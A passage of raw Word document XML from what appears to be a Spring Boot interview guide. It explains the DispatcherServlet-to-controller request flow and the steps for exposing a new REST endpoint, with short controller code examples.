          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A632AE2"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HandlerMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3970FAF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After receiving the request, the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DispatcherServlet</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> consults the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HandlerMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find the appropriate </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>controller method</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that can handle the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E59A26A"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HandlerMappings can be of different types, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB88292" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5"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RequestMappingHandlerMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the most common for REST APIs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3475C826" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5"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impleUrlHandlerMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (used for static resources)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258C1A9F"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Key Role:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> HandlerMapping helps to match the URL with the correct handler (i.e., method in the controller) based on the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE5FDD0"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Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3446C2F2"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Once DispatcherServlet identifies the correct handler method through HandlerMapping, the request is forwarded to the appropriate </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>controller</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> class (annotated with @RestController or @Controller).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B1821A"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controller method then processes the request and returns the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D8DE29"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p>
    <w:p w14:paraId="1FCFA602"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tController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C206FC4"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questMapping("/api")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036CB8A1"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MyController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF3A6DE" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A557D33"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tMapping("/hello")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB0CC65"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ring sayHello() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159E0161"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Hello, World!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A7B30A"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618C6770"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269279A"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the above example, when you hit http://localhost:8080/api/hello, MyController’s sayHello() method will be invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772118B5"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4. Service Layer (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBDC8D2"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After the request is processed by the controller, the controller might delegate the business logic to the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>service layer</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (annotated with @Service).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACDFDE0"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service layer contains the core business logic and is typically responsible for interacting with repositories and handling more complex operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B914F31"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5. Repository Layer (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7097FC51"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f the controller or service layer requires data from a database, it will delegate the task to the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>repository layer</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (usually using Spring Data JPA or similar).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B79063"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repository layer is typically annotated with @Repository and interacts with the database to perform CRUD operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2ADB3D"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ummary of the Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6929929E"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HTTP Request</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DispatcherServlet</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the front controller)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEAA0F8"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ispatcherServlet</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HandlerMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to determine the appropriate </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>controller method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162E47AD"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lastRenderedPageBreak/>
        <w:t>Controller Method</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> processes the request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08807BD0"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Optional:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Controller may invoke </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Service Layer</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for business logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441A845F"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Optional:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Service Layer invokes </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Repository Layer</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for database access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485517FD" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038618D5"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f you hit the URL http://localhost:8080/api/hello, the flow is as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7367A3"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ispatcherServlet</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> receives the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485BC443"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HandlerMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> maps the request to MyController.sayHello().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03851556"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ayHello()</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method in the controller is invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2390334D"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controller returns the response (e.g., "Hello, World!").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0CC725" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B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Thus, the first class invoked is the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DispatcherServlet</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (which is automatically configured by Spring Boot), and it handles routing the request to the appropriate controller method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA9FE3F" w14:textId="3DE72968"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8361598">
          <v:rect id="_x0000_i2677" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1D8868" w14:textId="6D96352D" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="004F0738">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="642" w:name="_Toc196308122"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>If you have to expose a new endpoint, what steps will you follow</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="642"/>
    </w:p>
    <w:p w14:paraId="44200477" w14:textId="62EBD634" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E7"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o expose a new endpoint in a Spring Boot application, here’s the step-by-step process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5831D5" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E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Define a New Controller Class (If Needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217C81BC"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f the endpoint belongs to a specific domain or resource, create a new controller class or use an existing one. The controller is responsible for handling incoming HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4089DC78"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p>
    <w:p w14:paraId="03DBB2E7"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tController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6AEA16"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questMapping("/api")  // Common prefix for all endpoints in this controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A3213E"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MyNewController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3EF36F" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E7" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="790DADBB"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Step 2: Define the new endpoint (method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCED8EB"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6647E1F"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RestController annotation combines @Controller and @ResponseBody, indicating that this class will handle RESTful API requests and the return value of methods will be written directly to the HTTP response body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1847416F"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questMapping("/api") is used to define a common prefix for all API endpoints within this controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A5EE75" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E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Define a Method to Handle the New Endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B9BBA4"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side your controller class, define a method that will handle the HTTP request for the new endpoint. Use the appropriate HTTP method annotation (e.g., @GetMapping, @PostMapping, @PutMapping, etc.) based on the action you want to perform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08608B2D"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p>
    <w:p w14:paraId="7AC80174"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tMapping("/message") // Endpoint to handle GET requests to /api/message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ECC39D"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String getMessage() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47193D45"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Hello, Spring Boot!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5054BD"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ACF93E0"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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6868E192"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tMapping("/message") maps HTTP GET requests to /api/message to the getMessage() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA29F25"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method returns a simple string, which will be sent as the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC000A4" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E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Handle the Request with Path Variables or Query Parameters (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE5883E"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f the new endpoint requires parameters (e.g., query parameters or path variables), you can add them to the method signature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A88551"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p>
    <w:p w14:paraId="530F699D"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tMapping("/greet/{name}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1153892D"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String greetUser(@PathVariable String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC22E5B"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Hello, " + name + "!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50793CF0"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623A1E5"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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3006BECF"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athVariable is used to capture the {name} part of the URL and pass it as a method parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD2E544"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lternatively, you can use query parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB221EA"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tMapping("/greet")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CC0166"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String greetUser(@RequestParam String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275E7568"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Hello, " + name + "!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCAD7F7"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19CC1FFC"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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F3C6C3"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RequestParam is used to extract query parameters like ?name=John from the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111CF3DF" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E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4. Define the Return Type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC45B00"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return various types from your endpoint, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE3D02F"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tring</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Plain text or JSON-serializable objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B69C53"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ResponseEntity</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows more control over the response status code, headers, and body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139802BB"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p>
    <w:p w14:paraId="49AD8CF6"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tMapping("/status")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220588B8"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ResponseEntity&lt;String&gt; getStatus() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495ABC08"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ResponseEntity.status(HttpStatus.OK).body("Success");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EC59CC"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E3DA73F"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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E46084E"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ponseEntity gives you the flexibility to return both status code and the response body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB9922B" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E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5. Handle Business Logic (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2962F2"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f the new endpoint requires complex business logic, you can call a service class to handle the business processing. This keeps the controller lightweight and focused on handling HTTP requests and responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C5CA42"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p>
    <w:p w14:paraId="29ED38FE"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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB03B26"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rivate MyService myService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD9D03C" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E7" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="421666D0"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tMapping("/calculate")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70730B4E"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ResponseEntity&lt;Integer&gt; calculateResult(@RequestParam int a, @RequestParam int b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0885B610"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int result = myService.calculate(a, b);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA627B5"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ResponseEntity.ok(result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4DFE74"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14278EB8"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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9AF5DF"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controller calls the service method to perform calculations and return the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD73B5C" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E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6. Update the application.properties or application.yml (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0D1FF9"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f your new endpoint requires some configuration (e.g., setting up a property or enabling a feature), you may need to update the application.properties or application.yml file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25906E7F"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p>
    <w:p w14:paraId="30EBCC37"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pi.greeting.enabled=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610617CB"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is optional and only needed if your new endpoint requires configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CBC154" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E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7. Test the Endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C493A6"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After adding the new endpoint, it's important to test it to ensure that it works as expected. You can use tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Postman</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cURL</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Swagger UI</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to test the endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506122DE"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p>
